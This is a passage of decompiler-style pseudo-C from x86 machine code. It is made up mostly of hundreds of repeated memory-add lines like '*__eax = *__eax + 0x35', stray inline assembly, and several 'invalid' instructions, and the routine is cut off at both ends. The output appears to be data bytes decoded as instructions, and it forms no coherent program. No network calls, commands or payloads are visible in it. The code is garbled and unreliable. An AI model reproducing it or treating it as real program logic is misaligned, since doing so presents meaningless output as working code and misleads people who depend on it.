											__ah = 0x1a + __dh;
											 *__eax =  *__eax + __eax;
											__al = 0x75 + __ch + __cl + __dl;
											__al = 0x75 + __ch + __cl + __dl &  *__eax;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											asm("pushad");
											_t155 = __eax;
											__eax = __edi;
											__edi = _t155;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax - 0x1fffbeda)) =  *((intOrPtr*)(__eax - 0x1fffbeda)) + __dh;
											asm("adc al, [eax]");
											 *__eax =  *__eax + __cl;
											 *__ecx =  *__ecx ^ 0x00000035;
											__esi = __esi + 1;
											asm("adc eax, [eax]");
											 *__eax =  *__eax + __dh;
											__ecx = __ecx + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											__ah = 0x1a + __dh + 0x1a + __dh;
											asm("sbb [eax], al");
											 *__eax =  *__eax & 0x00000035;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + __eax;
											 *__eax =  *__eax + 0x35;
											 *__edx =  *__edx << 1;
											__eax = __eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__eax - 0xffbf6e)) =  *((intOrPtr*)(__eax - 0xffbf6e)) + 0x1a;
											asm("invalid");
											 *__eax =  *__eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__ebx =  *__ebx + 0x1a;
											__eax = __eax + 1;
											 *__eax =  *__eax + __cl;
											 *__ecx =  *__ecx ^ 0x00000035;
											_pop(ds);
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__esi + __ebx + 0x40)) =  *((intOrPtr*)(__esi + __ebx + 0x40)) + __bl;
											 *__ecx =  *__ecx + 0x35;
											 *__eax =  *__eax + 0x1a;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											__ah = 0x1a + __dh + 0x1a + __dh + __bh;
											asm("in al, dx");
											 *((intOrPtr*)(__bx + __si + 0x1e)) =  *((intOrPtr*)(__bx + __si + 0x1e)) + __bl;
											__eax = __eax + 1;
											 *__ecx =  *__ecx + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__eax + 0x24)) =  *((intOrPtr*)(__eax + 0x24)) + __bl;
											__eax = __eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											__al = __al + __bl;
											_push(ds);
											__eax = __eax + 1;
											 *__ecx =  *__ecx + 0x35;
											 *__eax =  *__eax + 0x35;
											__al = __al + 0x1a;
											_push(ds);
											__eax = __eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											__ah = 0x1a + __dh + 0x1a + __dh + __bh + __bl;
											__eax = __eax + 1;
											 *__esi =  *__esi + 0x35;
											 *__eax =  *__eax + 0x35;
											__al = __al + 0x1a;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x35;
											 *((intOrPtr*)(__edi + 0x6c006801)) =  *((intOrPtr*)(__edi + 0x6c006801)) + __dh;
											__al = __al + __dl;
											ds = ds;
											__eax = __eax + 1;
											__al = __al + __cl;
											__eflags = __eax -  *__ecx;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											asm("rcr byte [ebp+0x63], 1");
											 *((intOrPtr*)(__ebx + __esi + 0x40)) =  *((intOrPtr*)(__ebx + __esi + 0x40)) + __dl;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											asm("adc [eax], eax");
											__al = __al ^ 0x00000000;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + __eax;
											__eax = __eax +  *__eax;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											__eax = 0x4006361;
											__ebp = ds;
											 *0x4006361 =  *0x4006361 + 0x35;
											ds = 0x3000100;
											 *0x4006361 =  *0x4006361 + __bh;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											__bh = __bh + __bh;
											asm("invalid");
											 *0x4006361 =  *0x4006361 + 1;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											__al = __al + __cl;
											asm("popad");
											asm("arpl [eax], ax");
											__al = __al | 0x0000005f;
											asm("arpl [eax], ax");
											asm("invalid");
											asm("invalid");
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											__al = __al & 0x00000040;
											 *0x4006361 =  *0x4006361 + 0x35;
											asm("sbb [eax], al");
											__al = __al ^ 0x00000000;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x0C012A23 = 0x1a;
											 *0x0800C6C2 =  *((intOrPtr*)(0x800c6c2)) + 0x35;
											__eax = 0x4006361 +  *0x4006361;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											asm("in al, dx");
											ds = 0x78004024;
											__eax = 0x4006361 +  *0x4006361 + 1;
											 *0xFFFFFFFF9C00C6C2 =  *((intOrPtr*)(0xffffffff9c00c6c2)) + __ch;
											__al = __al & 0x00000040;
											 *((intOrPtr*)(0x800c6c2)) =  *((intOrPtr*)(0x800c6c2)) + 0x35;
											__eax = 0x4006361 +  *0x4006361 + 1 +  *__eax;
											__eax = __eax + 1;
											 *0x4006361 =  *0x4006361 + __bl;
											 *0x4006361 =  *0x4006361 + __bh;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x0700A385 =  *((intOrPtr*)(0x700a385)) + __cl;
											 *__ebx =  *__ebx + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x040063A1 =  *((intOrPtr*)(0x40063a1)) + 0x1a;
											 *0x1C00C6C2 =  *((intOrPtr*)(0x1c00c6c2)) + __ch;
											__eax = __eax & 0x00030040;
											__eax = __eax +  *__eax;
											__eax = __eax + 1;
											 *__ecx =  *__ecx + __dl;
											 *((intOrPtr*)(0x800c6c2)) =  *((intOrPtr*)(0x800c6c2)) + __bh;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x20040 =  *0x20040 & 0x0000001a;
											__eax = __eax +  *__eax;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											__fp0 = __fp0 -  *0x4006361;
											__eax = __eax + 1;
											 *0x3400C6C2 =  *((intOrPtr*)(0x3400c6c2)) + __bh;
											__eax = __eax & 0x00020040;
											__eax = __eax +  *__eax;
											__eax = __eax + 1;
											 *__edi =  *__edi + __bl;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											__eflags = 0x35 - 0x25;
											__eax = __eax + 1;
											__bh = __bh + __bh;
											asm("invalid");
											 *0x4006361 =  *0x4006361 + 1;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + __bh;
											 *0x4006361 =  *0x4006361 & 0x04006361;
											asm("enter 0x6361, 0x0");
											__esp = __esp - 1;
											__eax = __eax & 0xffff0040;
											asm("invalid");
											__eax = __eax + 1;
											 *0x4400 =  *0x4400 + __cl;
											_a64 = _a64 + __dl;
											 *0x300 =  *0x300 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											__ah = __ah + __cl;
											 *0x4006361 =  *0x4006361 & 0x04006361;
											__fp0 = __fp0 -  *((intOrPtr*)(__ecx + 0x63));
											_a64 = _a64 + 0x1a;
											 *0x40000300 =  *0x40000300 + 0x35;
											 *__ecx =  *__ecx + __dl;
											 *0x4006361 =  *0x4006361 + __cl;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x10040 =  *0x10040 & 0x0000001a;
											__eax = __eax +  *__eax;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											 *0x4006361 =  *0x4006361 + 0x35;
											asm("sbb [edx], ah");
											__eax = __eax + 1;
											 *0x7400C6C2 =  *((intOrPtr*)(0x7400c6c2)) + __bh;
											__eax = __eax & 0x00010040;
											_t201 = __eax;
											__eax = __esi;
											__esi = _t201;
											__al = 0x22;
											__eax = __eax + 1;
											__dl = __dl + __cl;
											__al = 0x00000022 &  *__eax;
											__eflags = 0x22;
											if(0x22 >= 0) {
												__eax = __eax + 1;
												 *((intOrPtr*)(__ecx - 0x5cffbfde)) =  *((intOrPtr*)(__ecx - 0x5cffbfde)) + __cl;
												__al = __al &  *__eax;
												__ebp = 0x4022;
												 *__eax =  *__eax + 0x22;
												__al = __al + 0x1a;
												_push(ds);
												__eax = __eax + 1;
												__al = __al + 0x1a;
												asm("sbb eax, 0x159e0040");
												__eax = __eax + 1;
												_t204 = 0x4022 + __edx + 0x15aa0040;
												 *_t204 =  *(0x4022 + __edx + 0x15aa0040) + 0x1a;
												__eflags =  *_t204;
											}
											asm("stosb");
											asm("adc eax, 0x40");
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__edi =  *__edi | __bl;
											__eax = __eax + 1;
											__al = __al + __ah;
											asm("sbb eax, 0x159e0040");
											__eax = __eax + 1;
											 *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) =  *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) + __ah;
											__eax = __eax + 1;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __dh;
											_pop(ds);
											__eax = __eax + 1;
											__al = __al + __ah;
											asm("sbb eax, 0x159e0040");
											__eax = __eax + 1;
											 *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) =  *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) + __ah;
											__eax = __eax + 1;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *((intOrPtr*)(__eax + 0x1f)) =  *((intOrPtr*)(__eax + 0x1f)) + __bl;
											__eax = __eax + 1;
											__al = __al + __ah;
											asm("sbb eax, 0x159e0040");
											__eax = __eax + 1;
											 *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) =  *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) + __ah;
											__eax = __eax + 1;
											 *((intOrPtr*)(__edx + 0x40)) =  *((intOrPtr*)(__edx + 0x40)) + __dh;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *((intOrPtr*)(__ecx + 0x4022)) =  *((intOrPtr*)(__ecx + 0x4022)) + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *((intOrPtr*)(__eax - 0x1fffbfe1)) =  *((intOrPtr*)(__eax - 0x1fffbfe1)) + __al;
											asm("sbb eax, 0x159e0040");
											__eax = __eax + 1;
											 *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) =  *((intOrPtr*)(__ebp + __edx + 0x15aa0040)) + __ah;
											__eax = __eax + 1;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
